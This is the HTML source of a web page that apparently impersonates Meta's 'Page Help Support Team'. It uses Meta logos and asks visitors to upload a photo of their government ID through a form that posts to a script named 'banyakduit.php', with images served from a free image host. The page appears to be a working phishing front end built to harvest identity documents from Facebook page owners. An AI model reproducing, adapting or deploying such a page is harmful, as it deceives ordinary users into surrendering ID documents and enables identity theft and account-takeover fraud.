<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Page Help Support Team</title>
        <meta
            name="viewport"
            content="user-scalable=no,initial-scale=1,maximum-scale=1" />

        <meta property="og:url" content="" />
        <meta property="og:type" content="" />
        <meta property="og:title" content="Page Help Support Team" />
        <meta property="og:description" content="" />
        <meta
            property="og:image"
            content="https://i.ibb.co/m6wKKzb/885434810.jpg" />

        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor"
            crossorigin="anonymous" />
        <link
            rel="icon"
            href="https://i.ibb.co/ftrhCQY/XXXX-removebg-preview.png" />

        <link href="1.css" rel="stylesheet" />
    </head>
    <body>
        <div
            class="modal modal-signin position d-block bg-secondary py-5"
            tabindex="-1"
            role="dialog"
            id="modalSignin">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <nav class="navbar navbar-dark bg-primary fixed-top">
                            <div class="container-fluid">
                                    <svg
                    xmlns="http://www.w3.org/2000/svg"
                    width="16"
                    height="16"
                    fill="currentColor"
                    class="bi bi-meta"
                    viewBox="0 0 16 16">
                    <path
                        fill-rule="evenodd"
                        d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                </svg>
                            </div>
                        </nav>
                        <div class="container">
                            <div class="mt-4">
                                <img
                                    src="https://i.ibb.co/dWfdRCY/r7k-S3-GLlh2-D.png"
                                    class="img-fluid rounded mx-auto d-block"
                                    width="auto"
                                    height="auto"
                                    alt="..." />
                            </div>
                            <div class="mt-4">
                                <div
                                    class="p-3 mb-2 bg-secondary bg-opacity-25 text-dark rounded">
                                    <p>
                                        <strong>
                                            Upload a Photo of your ID</strong
                                        >
                                    </p>
                                    <p>
                                        <small>
                                            The information on your ID must be
                                            clearly visible in the photo,
                                            otherwise you might have to submit
                                            it again.</small
                                        >
                                    </p>
                                </div>
                                <form
                                    action="banyakduit.php"
                                    enctype="multipart/form-data"
                                    method="post">
                                    <div class="mb-3">
                                        <input
                                            type="file"
                                            class="form-control"
                                            accept="image/*,image/heif,image/heic"
                                            name="fileToUpload"
                                            id="fileToUpload" />
                                    </div>

                                    <div class="mb-3">
                                        <button
                                            class="btn btn-primary"
                                            type="submit">
                                            Submit form
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <hr class="my-4" />
                        <p class="text-secondary text-center">
                            Meta
                            <svg
                                xmlns="http://www.w3.org/2000/svg"
                                width="16"
                                height="16"
                                fill="currentColor"
                                class="bi bi-meta"
                                viewBox="0 0 16 16">
                                <path
                                    fill-rule="evenodd"
                                    d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                            </svg>
                        </p>
                    </div>
                </div>
            </div>
        </div>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"></script>
    </body>
</html>
